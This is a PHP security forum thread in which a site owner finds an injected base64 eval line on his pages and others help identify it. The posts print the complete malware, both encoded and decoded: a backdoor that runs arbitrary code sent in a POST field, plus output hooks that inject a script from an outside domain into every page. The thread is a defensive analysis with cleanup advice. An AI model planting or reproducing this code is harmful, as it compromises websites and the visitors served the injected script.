<?php eval(base64_decode('aWYoI....)); ?> Is website hacked?

Discussions of secure PHP coding. Security in software is important, so don't be afraid to ask. And when answering: be anal. Nitpick. No security vulnerability is too small.

Moderator: General Moderators

Post Reply
User avatar
nehrav
Forum Commoner
Posts: 38
Joined: Sun Sep 20, 2009 6:55 am
Location: New Delhi
Contact:

<?php eval(base64_decode('aWYoI....)); ?> Is website hacked?

Post by nehrav »

Hi,

I want advice on this from experts.

Some of my web documents are showing

Code: Select all

<?php eval(base64_decode('aWYoIWZ1......a long thread of code.............')); ?>
added automatically :banghead: in the first line of my web pages, on uploading them on server :dubious: ,
whereas I haven't add any code of this sort on my own.

Anybody have the idea, why it's reacting so strange.... :crazy:
User avatar
onion2k
Jedi Mod
Posts: 5263
Joined: Tue Dec 21, 2004 5:03 pm
Location: usrlab.com

Re: <?php eval(base64_decode('aWYoI....)); ?> Is website hacked?

Post by onion2k »

That doesn't look good, but what it's actually doing depends on what the code is. Post it in full here (in

Code: Select all

or

Code: Select all

tags) and one of us will tell you exactly what it is.
User avatar
nehrav
Forum Commoner
Posts: 38
Joined: Sun Sep 20, 2009 6:55 am
Location: New Delhi
Contact:

Re: <?php eval(base64_decode('aWYoI....)); ?> Is website hacked?

Post by nehrav »

onion2k wrote:That doesn't look good, but what it's actually doing depends on what the code is. Post it in full here (in

Code: Select all

or

Code: Select all

tags) and one of us will tell you exactly what it is.[/quote]


Thanks for your quick reply onion, but is it safe to post it here..  . Secondly, Is it somewhere related to website hacking??
User avatar
Apollo
Forum Regular
Posts: 794
Joined: Wed Apr 30, 2008 2:34 am

Re: <?php eval(base64_decode('aWYoI....)); ?> Is website hacked?

Post by Apollo »

Yep, your website or server got hacked. Better change your passwords immediately, re-upload your site completely, and inform your hosting provider.
User avatar
pickle
Briney Mod
Posts: 6445
Joined: Mon Jan 19, 2004 6:11 pm
Location: 53.01N x 112.48W
Contact:

Re: <?php eval(base64_decode('aWYoI....)); ?> Is website hacked?

Post by pickle »

Yes it's safe to post. As long as the eval() isn't executed (PHP code that is posted isn't executed), there's no harm. My guess is it's an iframe of some sort.
Real programmers don't comment their code. If it was hard to write, it should be hard to understand.
User avatar
nehrav
Forum Commoner
Posts: 38
Joined: Sun Sep 20, 2009 6:55 am
Location: New Delhi
Contact:

Re: <?php eval(base64_decode('aWYoI....)); ?> Is website hacked?

Post by nehrav »

ok, then code automatically added on my index page is

Code: Select all

<?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygndXEyJykpe2Z1bmN0aW9uIHVxMigkcyl7aWYocHJlZ19tYXRjaF9hbGwoJyM8c2NyaXB0KC4qPyk8L3NjcmlwdD4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdYXMkdilpZihjb3VudChleHBsb2RlKCJcbiIsJHYpKT41KXskZT1wcmVnX21hdGNoKCcjW1wnIl1bXlxzXCciXC4sO1w/IVxbXF06Lzw+XChcKV17MzAsfSMnLCR2KXx8cHJlZ19tYXRjaCgnI1tcKFxbXShccypcZCssKXsyMCx9IycsJHYpO2lmKChwcmVnX21hdGNoKCcjXGJldmFsXGIjJywkdikmJigkZXx8c3RycG9zKCR2LCdmcm9tQ2hhckNvZGUnKSkpfHwoJGUmJnN0cnBvcygkdiwnZG9jdW1lbnQud3JpdGUnKSkpJHM9c3RyX3JlcGxhY2UoJHYsJycsJHMpO31pZihwcmVnX21hdGNoX2FsbCgnIzxpZnJhbWUgKFtePl0qPylzcmM9W1wnIl0/KGh0dHA6KT8vLyhbXj5dKj8pPiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF1hcyR2KWlmKHByZWdfbWF0Y2goJyNbXC4gXXdpZHRoXHMqPVxzKltcJyJdPzAqWzAtOV1bXCciPiBdfGRpc3BsYXlccyo6XHMqbm9uZSNpJywkdikmJiFzdHJzdHIoJHYsJz8nLic+JykpJHM9cHJlZ19yZXBsYWNlKCcjJy5wcmVnX3F1b3RlKCR2LCcjJykuJy4qPzwvaWZyYW1lPiNpcycsJycsJHMpOyRzPXN0cl9yZXBsYWNlKCRhPWJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZENCemNtTTlhSFIwY0RvdkwzWmhjMkZwYTJGeUxtOXlaeTl0WVcxaWIzUnpMM05sWVhKamFDNXdhSEFnUGp3dmMyTnlhWEIwUGc9PScpLCcnLCRzKTtpZihzdHJpc3RyKCRzLCc8Ym9keScpKSRzPXByZWdfcmVwbGFjZSgnIyhccyo8Ym9keSkjbWknLCRhLidcMScsJHMsMSk7ZWxzZWlmKHN0cnBvcygkcywnPGEnKSkkcz0kYS4kcztyZXR1cm4kczt9ZnVuY3Rpb24gdXEyMigkYSwkYiwkYywkZCl7Z2xvYmFsJHVxMjE7JHM9YXJyYXkoKTtpZihmdW5jdGlvbl9leGlzdHMoJHVxMjEpKWNhbGxfdXNlcl9mdW5jKCR1cTIxLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpYXMkdilpZigoJGE9JHZbJ25hbWUnXSk9PSd1cTInKXJldHVybjtlbHNlaWYoJGE9PSdvYl9nemhhbmRsZXInKWJyZWFrO2Vsc2Ukc1tdPWFycmF5KCRhPT0nZGVmYXVsdCBvdXRwdXQgaGFuZGxlcic/ZmFsc2U6JGEpO2ZvcigkaT1jb3VudCgkcyktMTskaT49MDskaS0tKXskc1skaV1bMV09b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7fW9iX3N0YXJ0KCd1cTInKTtmb3IoJGk9MDskaTxjb3VudCgkcyk7JGkrKyl7b2Jfc3RhcnQoJHNbJGldWzBdKTtlY2hvICRzWyRpXVsxXTt9fX0kdXEybD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcigndXEyMicpKSE9J3VxMjInKT8kYTowO2V2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpOw==')); ?>
Please, help me as I have no idea of this. I am new to php...
User avatar
nehrav
Forum Commoner
Posts: 38
Joined: Sun Sep 20, 2009 6:55 am
Location: New Delhi
Contact:

Re: <?php eval(base64_decode('aWYoI....)); ?> Is website hacked?

Post by nehrav »

Apollo wrote:Yep, your website or server got hacked. Better change your passwords immediately, re-upload your site completely, and inform your hosting provider.
Which password I need to change, FTP or database or something else???
User avatar
Apollo
Forum Regular
Posts: 794
Joined: Wed Apr 30, 2008 2:34 am

Re: <?php eval(base64_decode('aWYoI....)); ?> Is website hacked?

Post by Apollo »

nehrav wrote:Which password I need to change, FTP or database or something else???
ALL!

Your account has been compromised. So better change any password you have that is related to this account.
josh
DevNet Master
Posts: 4872
Joined: Wed Feb 11, 2004 3:23 pm
Location: Palm beach, Florida

Re: <?php eval(base64_decode('aWYoI....)); ?> Is website hacked?

Post by josh »

Code: Select all

if(!function_exists('uq2')){function uq2($s){if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0]as$v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))foreach($a[0]as$v)if(preg_match('#[\. ]width\s*=\s*[\'"]?0*[0-9][\'"> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))$s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);$s=str_replace($a=base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL3Zhc2Fpa2FyLm9yZy9tYW1ib3RzL3NlYXJjaC5waHAgPjwvc2NyaXB0Pg=='),'',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',$a.'\1',$s,1);elseif(strpos($s,'<a'))$s=$a.$s;return$s;}function uq22($a,$b,$c,$d){global$uq21;$s=array();if(function_exists($uq21))call_user_func($uq21,$a,$b,$c,$d);foreach(@ob_get_status(1)as$v)if(($a=$v['name'])=='uq2')return;elseif($a=='ob_gzhandler')break;else$s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('uq2');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}$uq2l=(($a=@set_error_handler('uq22'))!='uq22')?$a:0;eval(base64_decode($_POST['e']));
Which has the result of appending

Code: Select all

script src=http://vasaikar.org/mambots/search.php ></script>
to the end of your body tag. And that url gives me a 404, probably returned the real code. The hacker did it this way so after he took it down there was no trace of what he did.
User avatar
nehrav
Forum Commoner
Posts: 38
Joined: Sun Sep 20, 2009 6:55 am
Location: New Delhi
Contact:

Re: <?php eval(base64_decode('aWYoI....)); ?> Is website hacked?

Post by nehrav »

@Josh, what this code means & what the hacker is trying to do??

Plz suggest me, how I can avoid this :banghead: ??
User avatar
kaisellgren
DevNet Resident
Posts: 1675
Joined: Sat Jan 07, 2006 5:52 am
Location: Lahti, Finland.

Re: <?php eval(base64_decode('aWYoI....)); ?> Is website hacked?

Post by kaisellgren »

Clean up everything you can find on the server, change all passwords (and possibly usernames too), update all software you have there running and avoid using less popular and unknown scripts/software. If it does not get better, you would be better off asking someone to take care of it for yourself.
Post Reply